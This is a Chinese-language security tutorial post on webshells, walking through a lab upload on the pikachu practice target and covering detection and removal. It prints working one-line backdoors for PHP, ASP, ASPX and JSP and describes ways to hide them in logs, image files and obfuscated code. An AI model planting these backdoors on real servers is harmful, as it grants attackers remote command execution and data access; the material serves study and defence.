web安全攻击的一般流程

目录 简介 原理 常见一句话木马 php asp aspx jsp 攻击 WebShell管理工具 webshell隐藏 检测与防御 静态检测 参考 webshell webshell查杀 参考 简介 Webshell是通过服务器开放的端口获取服务器的某些权限。 webshell又称脚本木马,一般分为大马、小马、一句话木马。 大马,体积大、功能齐全、能够管理数据库

目录

简介

原理

常见一句话木马

php

asp

aspx

jsp

攻击

WebShell管理工具

webshell隐藏

检测与防御

静态检测

参考

webshell

webshell查杀

参考


简介

Webshell是通过服务器开放的端口获取服务器的某些权限。

webshell又称脚本木马,一般分为大马、小马、一句话木马。

大马,体积大、功能齐全、能够管理数据库、文件管理、对站点进行快速的信息收集,甚至能够提权。

小马,一般而言,我们在上传文件的时候,会被限制上传的文件大小或是拦截的情况,那么我通过小马来上传大马,实现我们想要的功能。

一句话木马,短小精悍、功能强大、隐蔽性好、使用客户端可以快速管理webshell。

原理

利用文件上传漏洞、SQL注入漏洞、RCE漏洞等,将恶意文件放到web服务器中,也就是常说的”后门”,之后可以进行文件管理、数据库管理、远程命令执行、提权等恶意操作。

常见一句话木马

php

<?php @eval($_POST[value]); ?>

<?php assert($_POST[value]);?>

<?php
@preg_replace("/[email]/e",$_POST['h'],"error");
?>

asp

<%eval request ("value")%>

<% execute(request("value")) %>

aspx

<%@ Page Language="Jscript" %> <% eval(Request.Item["value"]) %>

jsp

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>

攻击

靶机:pikachu

工具:中国蚁剑

首先,利用文件上传漏洞,上传webshell文件

网络安全-文件上传漏洞的原理、攻击与防御_Python\程序员小泉-CSDN博客

文件为eval.php,内容为

<?php eval($_POST['eval']); ?>

之后利用中国蚁剑连接网站,空白处右键->添加数据

添加数据

添加数据成功

上传文件及其他功能

终端控制

再打开上传webshell的那个目录,可以看到多出来了%SystemDrive%目录,

目录变化

至此,可以进行文件管理,虚拟终端等。

WebShell管理工具

  • Cknife 中国菜刀
  • antSword 中国蚁剑
  • 冰蝎 动态二进制加密网站管理客户端
  • weevely3 Weaponized web shell
  • Altman the cross platform webshell tool in .NET
  • Webshell Sniper Manage your website via terminal
  • quasibot complex webshell manager, quasi-http botnet

webshell隐藏

隐藏到日志

例如,修改发送数据包的头部,添加webshell。 web服务器一般会保存访问记录到Web日志,若找到web日志,且放到可执行目录下,可能获得shell。

隐藏到合法文件

例如,文件上传漏洞中,将php代码放到jpg文件中,可以使用@运算符,以防发生任何错误。

混淆

删除空格、换行符等,导致代码文件比较乱,使用编码或加密来隐藏掉恶意函数名等。

检测与防御

静态检测

web日志

在对日志文件进行预处理后,对日志记录进行文本特征匹配、统计特征计算与文件关联性分析,最后对检测结果汇总,列出疑似的Webshell文件。

例如,网站目录下某php文件访问量过少,且来源ip固定。

动态检测

webshell传到服务器了,黑客总要去执行它吧,webshell执行时刻表现出来的特征,我们称为动态特征。

例如,webshell如果执行系统命令的话,会有进程。

以上面的攻击进行防御举例

webshell扫描

点击执行操作

后门被删除

webshell文件被删除,但是%SystemDrive%目录还存在。

总结:攻击层面还应考虑如何绕过系统上传webshell,如何隐藏webshell免查杀,防御方面应该考虑如何避免webshell被上传,如何查杀webshell。

参考

webshell

  • webshell
  • PHP backdoors
  • php bash - semi-interactive web shell
  • Python RSA Encrypted Shell
  • b374k - PHP WebShell Custom Tool
  • JSP Webshells
  • MemShellDemo

webshell查杀

  • D盾
  • 深信服WebShell查杀
  • 百度WEBDIR+
  • 河马
知秋君
上一篇 2024-09-11 22:36
下一篇 2024-09-11 22:02

相关推荐